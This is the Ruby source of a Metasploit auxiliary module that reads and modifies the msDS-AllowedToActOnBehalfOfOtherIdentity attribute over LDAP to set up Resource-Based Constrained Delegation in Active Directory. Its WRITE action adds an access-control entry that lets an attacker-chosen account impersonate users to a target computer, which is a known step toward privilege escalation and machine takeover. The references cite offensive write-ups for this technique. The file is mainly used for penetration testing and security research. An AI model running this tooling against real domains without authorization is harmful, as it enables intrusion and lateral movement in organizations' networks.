## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::LDAP ATTRIBUTE = 'msDS-AllowedToActOnBehalfOfOtherIdentity'.freeze def initialize(info = {}) super( update_info( info, 'Name' => 'Role Base Constrained Delegation', 'Description' => %q{ This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have write access to the target object (the object specified in DELEGATE_TO). }, 'Author' => [ 'Podalirius', # Remi Gascou (@podalirius_), Impacket reference implementation 'Charlie Bromberg', # Charlie Bromberg (@_nwodtuhs), Impacket reference implementation 'Spencer McIntyre' # module author ], 'References' => [ ['URL', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution'], ['URL', 'https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'], ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py'] ], 'License' => MSF_LICENSE, 'Actions' => [ ['FLUSH', { 'Description' => 'Delete the security descriptor' }], ['READ', { 'Description' => 'Read the security descriptor' }], ['REMOVE', { 'Description' => 'Remove matching ACEs from the security descriptor DACL' }], ['WRITE', { 'Description' => 'Add an ACE to the security descriptor DACL' }] ], 'DefaultAction' => 'READ', 'Notes' => { 'Stability' => [], 'SideEffects' => [CONFIG_CHANGES], # REMOVE, FLUSH, WRITE all make changes 'Reliability' => [] } ) ) register_options([ OptString.new('DELEGATE_TO', [ true, 'The delegation target' ]), OptString.new('DELEGATE_FROM', [ false, 'The delegation source' ]) ]) end def build_ace(sid) Rex::Proto::MsDtyp::MsDtypAce.new({ header: { ace_type: Rex::Proto::MsDtyp::MsDtypAceType::ACCESS_ALLOWED_ACE_TYPE }, body: { access_mask: Rex::Proto::MsDtyp::MsDtypAccessMask::ALL, sid: sid } }) end def fail_with_ldap_error(message) ldap_result = @ldap.get_operation_result.table return if ldap_result[:code] == 0 print_error(message) # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes case ldap_result[:code] when 1 fail_with(Failure::Unknown, "An LDAP operational error occurred. The error was: #{ldap_result[:error_message].strip}") when 16 fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.') when 50 fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.') when 51 fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.') when 52 fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.') when 53 fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.') when 64 fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.') when 65 fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.') end fail_with(Failure::Unknown, "Unknown LDAP error occurred: result: #{ldap_result[:code]} message: #{ldap_result[:error_message].strip}") end def get_delegate_from_obj delegate_from = datastore['DELEGATE_FROM'] if delegate_from.blank? fail_with(Failure::BadConfig, 'The DELEGATE_FROM option must be specified for this action.') end obj = ldap_get("(sAMAccountName=#{delegate_from})", attributes: ['sAMAccountName', 'ObjectSID']) if obj.nil? && !delegate_from.end_with?('$') obj = ldap_get("(sAMAccountName=#{delegate_from}$)", attributes: ['sAMAccountName', 'ObjectSID']) end fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_from}") unless obj obj end def ldap_get(filter, attributes: []) raw_obj = @ldap.search(base: @base_dn, filter: filter, attributes: attributes).first return nil unless raw_obj obj = {} obj['dn'] = raw_obj['dn'].first.to_s unless raw_obj['sAMAccountName'].empty? obj['sAMAccountName'] = raw_obj['sAMAccountName'].first.to_s end unless raw_obj['ObjectSid'].empty? obj['ObjectSid'] = Rex::Proto::MsDtyp::MsDtypSid.read(raw_obj['ObjectSid'].first) end unless raw_obj[ATTRIBUTE].empty? obj[ATTRIBUTE] = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(raw_obj[ATTRIBUTE].first) end obj end def run ldap_connect do |ldap| validate_bind_success!(ldap) if (@base_dn = datastore['BASE_DN']) print_status("User-specified base DN: #{@base_dn}") else print_status('Discovering base DN automatically') unless (@base_dn = discover_base_dn(ldap)) print_warning("Couldn't discover base DN!") end end @ldap = ldap delegate_to = datastore['DELEGATE_TO'] obj = ldap_get("(sAMAccountName=#{delegate_to})", attributes: ['sAMAccountName', 'ObjectSID', ATTRIBUTE]) if obj.nil? && !delegate_to.end_with?('$') obj = ldap_get("(sAMAccountName=#{delegate_to}$)", attributes: ['sAMAccountName', 'ObjectSID', ATTRIBUTE]) end fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_to}") unless obj send("action_#{action.name.downcase}", obj) end rescue Net::LDAP::Error => e print_error("#{e.class}: #{e.message}") end def action_read(obj) security_descriptor = obj[ATTRIBUTE] if security_descriptor.nil? print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.') return end if security_descriptor.dacl.nil? print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity DACL field is empty.') return end print_status('Allowed accounts:') security_descriptor.dacl.aces.each do |ace| account_name = ldap_get("(ObjectSid=#{ace.body.sid})", attributes: ['sAMAccountName']) if account_name print_status(" #{ace.body.sid} (#{account_name['sAMAccountName']})") else print_status(" #{ace.body.sid}") end end end def action_remove(obj) delegate_from = get_delegate_from_obj security_descriptor = obj[ATTRIBUTE] unless security_descriptor.dacl && !security_descriptor.dacl.aces.empty? print_status('No DACL ACEs are present. No changes are necessary.') return end aces = security_descriptor.dacl.aces.snapshot aces.delete_if { |ace| ace.body[:sid] == delegate_from['ObjectSid'] } delta = security_descriptor.dacl.aces.length - aces.length if delta == 0 print_status('No DACL ACEs matched. No changes are necessary.') return else print_status("Removed #{delta} matching ACE#{delta > 1 ? 's' : ''}.") end security_descriptor.dacl.aces = aces # clear these fields so they'll be calculated automatically after the update security_descriptor.dacl.acl_count.clear security_descriptor.dacl.acl_size.clear unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s) fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') end print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') end def action_flush(obj) unless obj[ATTRIBUTE] print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.') return end unless @ldap.delete_attribute(obj['dn'], ATTRIBUTE) fail_with_ldap_error('Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') end print_good('Successfully deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') end def action_write(obj) delegate_from = get_delegate_from_obj if obj[ATTRIBUTE] _action_write_update(obj, delegate_from) else _action_write_create(obj, delegate_from) end end def _action_write_create(obj, delegate_from) security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.new security_descriptor.owner_sid = Rex::Proto::MsDtyp::MsDtypSid.new('S-1-5-32-544') security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid']) unless @ldap.add_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s) fail_with_ldap_error('Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') end print_good('Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') print_status('Added account:') print_status(" #{delegate_from['ObjectSid']} (#{delegate_from['sAMAccountName']})") end def _action_write_update(obj, delegate_from) security_descriptor = obj[ATTRIBUTE] if security_descriptor.dacl if security_descriptor.dacl.aces.any? { |ace| ace.body[:sid].to_s == delegate_from['ObjectSid'].to_s } print_status("Delegation from #{delegate_from['sAMAccountName']} to #{obj['sAMAccountName']} is already enabled.") end # clear these fields so they'll be calculated automatically after the update security_descriptor.dacl.acl_count.clear security_descriptor.dacl.acl_size.clear else security_descriptor.control.dp = 1 security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS end security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid']) unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s) fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') end print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.') end end